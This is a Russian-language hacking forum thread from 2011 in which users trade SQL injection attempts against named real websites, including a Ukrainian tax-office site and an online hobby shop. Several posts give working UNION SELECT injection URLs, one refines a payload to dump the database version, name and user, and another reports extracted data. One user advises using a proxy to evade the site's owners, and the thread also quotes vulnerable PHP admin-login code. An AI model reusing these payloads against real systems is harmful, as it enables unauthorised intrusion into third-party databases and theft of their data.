HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 03.12.2011, 19:39
KolosJey
Новичок
Регистрация: 21.12.2009
Сообщений: 0
С нами: 8625634

Репутация: 0
По умолчанию

Цитата:
Сообщение от trololoman96  
можно ли как то обойти это не пользуясь уязвимостями с мультибатовыми кодировками ? Ибо сменить ее нет возможности, может у кого есть другое решение...
Ничего ты тут не сделаешь

UPD

Я надеюсь что там с данными ничего не происходит, и именно $data попадает в $this->adm_name, и поиск идёт по $filter[3], а то может эти куски отношения друг к другу не имеют )
 
Ответить с цитированием

  #2  
Старый 03.12.2011, 20:10
trololoman96
Участник форума
Регистрация: 01.12.2011
Сообщений: 120
С нами: 7604246

Репутация: 55
По умолчанию

Так и есть, $data передается в запрос и поиск идёт по $filter[3]. Код этот используется для авторизации в админку

PHP код:
[COLOR="#000000"][COLOR="#0000BB"]$sel[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]Query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT * FROM admin WHERE login='"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]adm_name[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"'"[/COLOR][COLOR="#007700"]);



if
([/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"][/COLOR][COLOR="#0000BB"]NumRows[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$sel[/COLOR][COLOR="#007700"])) {

[/
COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]adm_data[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]FetchArray[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$sel[/COLOR][COLOR="#007700"]);

if ([/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]adm_data[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'password'[/COLOR][COLOR="#007700"]] ==[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]adm_pass[/COLOR][COLOR="#007700"]) {

[/
COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'acplogin'[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]adm_data[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'login'[/COLOR][COLOR="#007700"]];

[/
COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'acppass'[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]adm_data[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'password'[/COLOR][COLOR="#007700"]];

[/
COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]redirect[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"admin.php"[/COLOR][COLOR="#007700"]);

} else {

[/
COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]redirect[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"admin.php?err=pError"[/COLOR][COLOR="#007700"]);

}

[/COLOR][/COLOR
все портит эта кавычка
 
Ответить с цитированием

  #3  
Старый 03.12.2011, 23:43
SHADOW785
Новичок
Регистрация: 01.11.2009
Сообщений: 0
С нами: 8697664

Репутация: 0
По умолчанию

Vbulletin 4.1.7

Код:
http://fpteam-cheats.com/board/post_thanks.php?do=post_thanks_remove_user&amp='
Можно ли из этого что-то извлечь?
 
Ответить с цитированием

  #4  
Старый 04.12.2011, 00:16
A_n_d_r_e_i
Участник форума
Регистрация: 02.09.2009
Сообщений: 286
С нами: 8784803

Репутация: 257
По умолчанию

Цитата:
Сообщение от SHADOW785  
Vbulletin 4.1.7
Код:
http://fpteam-cheats.com/board/post_thanks.php?do=post_thanks_remove_user&amp='
Можно ли из этого что-то извлечь?
Нет, просто ошибка коннекта к бд. Тут дело даже не в кавычке, а в параметре post_thanks_remove_user
 
Ответить с цитированием

  #5  
Старый 04.12.2011, 01:08
shadowrun
Постоянный
Регистрация: 29.08.2010
Сообщений: 842
С нами: 8265206

Репутация: 84


По умолчанию

Код:
http://www.nalog.od.ua/l.php?id=288+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15+--+
Не шарю как вывести
 
Ответить с цитированием

  #6  
Старый 04.12.2011, 01:10
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами: 10585560

Репутация: 1550


По умолчанию

Цитата:
Сообщение от shadowrun  
Код:
http://www.nalog.od.ua/l.php?id=288+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15+--+
Не шарю как вывести
http://www.nalog.od.ua/l.php?id=-288+union+select+1,concat_ws(0x3a,version(),databa se(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15+--+

что вывести то?
 
Ответить с цитированием

  #7  
Старый 04.12.2011, 01:13
shadowrun
Постоянный
Регистрация: 29.08.2010
Сообщений: 842
С нами: 8265206

Репутация: 84


По умолчанию

Цитата:
Сообщение от Gorev  
http://www.nalog.od.ua/l.php?id=-288+union+select+1,concat_ws(0x3a,version(),databa se(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15+--+
что вывести то?
Попробуй по ссылке перейти, поймешь. Ток проксю юзай, налоговики из ЮА настолько суровые...
 
Ответить с цитированием

  #8  
Старый 04.12.2011, 01:15
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами: 10585560

Репутация: 1550


По умолчанию

Цитата:
Сообщение от shadowrun  
Попробуй по ссылке перейти, поймешь. Ток проксю юзай, налоговики из ЮА настолько суровые...
natasha:0444730b0844225c

что именно понять то?
 
Ответить с цитированием

  #9  
Старый 04.12.2011, 01:20
shadowrun
Постоянный
Регистрация: 29.08.2010
Сообщений: 842
С нами: 8265206

Репутация: 84


По умолчанию

Цитата:
Сообщение от Gorev  
natasha:0444730b0844225c
что именно понять то?
бляяяя Я не увидел где оно выводит .

Gorev, спасибо!
 
Ответить с цитированием

  #10  
Старый 04.12.2011, 02:13
shadowrun
Постоянный
Регистрация: 29.08.2010
Сообщений: 842
С нами: 8265206

Репутация: 84


По умолчанию

Код:
http://www.hobbyshop.com.ua/dir.php?id=-223%27+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34+--+
Цитата:
Сообщение от None  
Найдено достаточно много товаров, пожалуйста уточните поисковый запрос
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Создать сделку

Продавец: ник или ID

Название сделки:

Сумма USDT:

Срок сделки, дней:

Кто платит комиссию:

Условия сделки:

После создания сделки средства будут зарезервированы в холде до завершения сделки.

×

Мои сделки

Загрузка...
×

Сделка


Загрузка чата...